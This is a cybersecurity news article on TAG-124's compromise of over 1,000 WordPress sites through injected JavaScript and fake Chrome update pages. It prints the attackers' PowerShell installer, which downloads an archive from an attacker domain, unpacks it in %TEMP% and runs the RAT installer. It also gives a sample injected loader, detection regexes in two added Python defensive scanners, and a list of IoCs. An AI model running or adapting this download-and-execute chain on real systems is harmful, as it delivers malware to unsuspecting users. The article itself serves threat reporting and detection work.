TAG-124 Hacked 1000+ WordPress Sites To Embed Payloads
A sophisticated cyber campaign orchestrated by the threat group TAG-124 has compromised over 1,000 WordPress websites to deploy malicious payloads.
The operation leverages a multi-layered Traffic Distribution System (TDS) to infect users with malware, demonstrating advanced evasion tactics and infrastructure management.
TAG-124’s infrastructure consists of compromised WordPress sites injected with malicious JavaScript to redirect visitors to attacker-controlled payload servers.
These servers host malware disguised as legitimate software updates, such as fake Google Chrome updates.
A central management panel allows attackers to control and update URLs, logic, and infection tactics, enabling dynamic and adaptive attack strategies.
Researchers at Insikt Group, Recorded Future's threat research division, noted that the attack begins when users visit compromised WordPress sites embedded with malicious scripts.
The injected script dynamically loads additional resources from attacker-controlled domains. TAG-124 frequently changes file names (e.g., metrics.js, hpms1989.js) and URLs to evade detection.
Payload Delivery
Visitors meeting specific conditions (geolocation or browser type) are redirected to fake landing pages mimicking legitimate software updates, for instance a page presenting an "Update Chrome" button.
The downloaded file, Release.zip, contains malware such as the REMCOS Remote Access Trojan (RAT). A PowerShell script hosted on the same domain automates the malware installation:
# Stage 1: fetch the archive from the attacker domain into the user's TEMP folder
$webClient = New-Object System.Net.WebClient
$url1 = "https://update-chronne[.]com/Release.zip"
$zipPath1 = "$env:TEMP\mgz.zip"
$webClient.DownloadFile($url1, $zipPath1)
# Stage 2: unpack it next to the download
Expand-Archive -Path $zipPath1 -DestinationPath "$env:TEMP\file"
# Stage 3: launch the dropped executable (the RAT installer)
Start-Process -FilePath "$env:TEMP\file\Set-upx.exe"
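The installer above is a three-stage chain (remote download, archive expansion, execution out of %TEMP%) that is easy to spot in PowerShell script-block logging (Event ID 4104) once the stages are matched together rather than one at a time. The following is an added example written for this article, not a detection published by Insikt Group; the log entries are constructed samples, and the non-IoC hostnames (cdn.unknown-host.test, reports.example.test) are placeholders:

```python
"""Triage PowerShell script-block logs for the download-extract-execute chain.

Added example, not a detection from Insikt Group or the article. It takes
PowerShell ScriptBlockText (Event ID 4104) entries, checks each for the three
stages seen in the TAG-124 installer (remote download, archive expansion,
launching the result from %TEMP%) and for the report's IoC domains, and
raises an alert when all three stages co-occur or an IoC domain appears.
The log entries below are constructed samples.
"""
import re

# IoC domains from the article; script text is re-fanged before matching.
IOC_DOMAINS = ("update-chronne.com", "vicrin.com")

STAGES = {
    "download": re.compile(
        r"\.DownloadFile\(|\.DownloadString\(|Invoke-WebRequest|\biwr\b|Start-BitsTransfer",
        re.I),
    "extract": re.compile(r"Expand-Archive|ZipFile\]::ExtractToDirectory", re.I),
    "run_from_temp": re.compile(r"Start-Process[^\r\n]*(\$env:TEMP|\\Temp\\)", re.I),
}


def analyze(script_text):
    """Return per-stage hits plus an overall 'alert' flag for one script block."""
    text = script_text.replace("[.]", ".")          # undo de-fanging
    hits = {name: bool(rx.search(text)) for name, rx in STAGES.items()}
    hits["ioc_domain"] = any(d in text.lower() for d in IOC_DOMAINS)
    # A single stage is common in admin scripts; all three together is the TDS chain.
    hits["alert"] = hits["ioc_domain"] or (
        hits["download"] and hits["extract"] and hits["run_from_temp"])
    return hits


# Constructed 4104 events: the article's installer, a rewritten variant on a
# placeholder host, and two benign admin scripts that each share one stage.
SAMPLE_EVENTS = [
    {"id": "tag124-installer", "ScriptBlockText": r"""
$webClient = New-Object System.Net.WebClient
$url1 = "https://update-chronne[.]com/Release.zip"
$zipPath1 = "$env:TEMP\mgz.zip"
$webClient.DownloadFile($url1, $zipPath1)
Expand-Archive -Path $zipPath1 -DestinationPath "$env:TEMP\file"
Start-Process -FilePath "$env:TEMP\file\Set-upx.exe"
"""},
    {"id": "variant-unknown-host", "ScriptBlockText": r"""
iwr -Uri https://cdn.unknown-host.test/pkg.zip -OutFile "$env:TEMP\p.zip"
Add-Type -AssemblyName System.IO.Compression.FileSystem
[System.IO.Compression.ZipFile]::ExtractToDirectory("$env:TEMP\p.zip", "$env:TEMP\p")
Start-Process "$env:TEMP\p\setup.exe"
"""},
    {"id": "admin-restore-backup", "ScriptBlockText": r"""
Expand-Archive -Path C:\backups\site-2024.zip -DestinationPath C:\inetpub\wwwroot
"""},
    {"id": "admin-fetch-report", "ScriptBlockText": r"""
Invoke-WebRequest -Uri https://reports.example.test/daily.csv -OutFile C:\reports\daily.csv
"""},
]


def triage(events):
    """Map each event id to its analysis so an analyst can sort alerts first."""
    return {e["id"]: analyze(e["ScriptBlockText"]) for e in events}


if __name__ == "__main__":
    for eid, res in triage(SAMPLE_EVENTS).items():
        print(f"{'ALERT' if res['alert'] else 'ok   '} {eid}: {res}")
```

Matching on the co-occurrence of stages rather than on the IoC domain alone is the point: TAG-124 rotates hosts and file names, so the two admin samples stay quiet while the rewritten variant on a fresh host still trips the rule.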
TAG-124 employs advanced techniques such as:-
- ClickFix Technique: Shows a fake error or verification dialog that instructs the visitor to paste and run a command the page has already placed on their clipboard.
- Dynamic URL Updates: Regularly changes URLs and filenames on compromised sites.
- Conditional Logic in TDS: Filters traffic based on visitor attributes to optimize infections.
The campaign has been linked to multiple ransomware groups, including Rhysida and Interlock, which utilize TAG-124’s infrastructure for their initial infection chains. The shared use of this TDS highlights collaboration among cybercriminal groups.
To protect against similar attacks, keep WordPress core, plugins, and themes updated to patch known vulnerabilities, and regularly scan for unauthorized JavaScript injections.
Implementing Web Application Firewalls (WAFs) helps block malicious traffic targeting vulnerable endpoints, while educating users about the risks of downloading software updates from unverified sources enhances overall security.
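One practical form of the "scan for unauthorized JavaScript injections" advice is a file-level sweep that pulls every external script host out of a WordPress tree and compares it against a site-specific allowlist and the report's IoC domains. The following is an added example, not tooling from Insikt Group or Cyber Security News; the allowlist, the theme files and the host cdn.unknown-tds.test are constructed for the demo:

```python
"""Scan a WordPress tree for injected external script loaders.

Added example, not tooling from Insikt Group or Cyber Security News. It walks
PHP/JS/HTML files under a WordPress root, pulls out every external script URL
(both <script src> tags and .js URLs inside inline loaders), and flags hosts
that are not on a site-specific allowlist or that match the report's IoC
domains. The allowlist and the sample files are constructed for the demo.
"""
import os
import re
import tempfile
from urllib.parse import urlparse

# IoC domains named in the article, with the de-fanging brackets removed.
IOC_DOMAINS = {"vicrin.com", "update-chronne.com"}

# Hosts this particular site legitimately loads scripts from (assumption).
ALLOWED_HOSTS = {"www.example-site.test", "fonts.googleapis.com"}

SCAN_EXT = {".php", ".js", ".html", ".htm"}

# <script ... src="URL"> tags.
SCRIPT_SRC = re.compile(r'<script[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)
# Quoted .js URLs, which is how dynamically injected loaders reference them.
JS_URL = re.compile(r'["\'](?:https?:)?//([^/"\'\s]+)/[^"\'\s]*\.js(?:\?[^"\'\s]*)?["\']', re.I)


def script_hosts(text):
    """Return the set of hosts that external script URLs in text point at."""
    hosts = set()
    for m in SCRIPT_SRC.finditer(text):
        url = m.group(1)
        if url.startswith("//"):          # protocol-relative URL
            url = "https:" + url
        host = urlparse(url).hostname
        if host:                          # relative paths have no host
            hosts.add(host.lower())
    for m in JS_URL.finditer(text):
        hosts.add(m.group(1).lower())
    return hosts


def classify(host):
    """Verdict for a script host: IoC match, not allowlisted, or None if fine."""
    if host in IOC_DOMAINS:
        return "ioc-match"
    if host not in ALLOWED_HOSTS:
        return "unknown-host"
    return None


def scan_tree(root):
    """Walk root and return a list of {file, host, verdict} findings."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            if os.path.splitext(name)[1].lower() not in SCAN_EXT:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            for host in sorted(script_hosts(text)):
                verdict = classify(host)
                if verdict:
                    findings.append({"file": os.path.relpath(path, root),
                                     "host": host, "verdict": verdict})
    return findings


# Constructed sample footers: one untouched, one carrying an injected loader
# in the style the article describes (rotating file name on an attacker host).
CLEAN_FOOTER = """<?php wp_footer(); ?>
<script src="https://www.example-site.test/wp-includes/js/jquery.js"></script>
</body></html>
"""
INJECTED_FOOTER = """<?php wp_footer(); ?>
<script>
var s=document.createElement('script');
s.src='https://vicrin.com/hpms1989.js';document.head.appendChild(s);
</script>
<script src="//cdn.unknown-tds.test/metrics.js"></script>
</body></html>
"""


def demo():
    """Build a throwaway WordPress tree with the two sample files and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for theme, body in (("clean", CLEAN_FOOTER), ("hacked", INJECTED_FOOTER)):
            d = os.path.join(root, "wp-content", "themes", theme)
            os.makedirs(d)
            with open(os.path.join(d, "footer.php"), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['verdict']:13} {f['host']:25} {f['file']}")
```

Run it against the real document root instead of the temp tree and feed the "unknown-host" results to whoever owns the site; because TAG-124 rotates file names, the host allowlist rather than a filename blocklist is what keeps the check useful, and an injection stored in the database (posts, widgets, options) needs the same regexes run over a wp_options and wp_posts export, which this file walk does not cover.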
Indicators of Compromise (IoCs)
Key domains and IPs used in the attack include:-
- Domains: vicrin[.]com, update-chronne[.]com
- IPs: 146.70.41[.]191, 45.61.136[.]67
Compromised WordPress sites include high-profile domains such as www[.]ecowas[.]int and www[.]reloadinternet[.]com.
The post TAG-124 Hacked 1000+ WordPress Sites To Embed Payloads appeared first on Cyber Security News.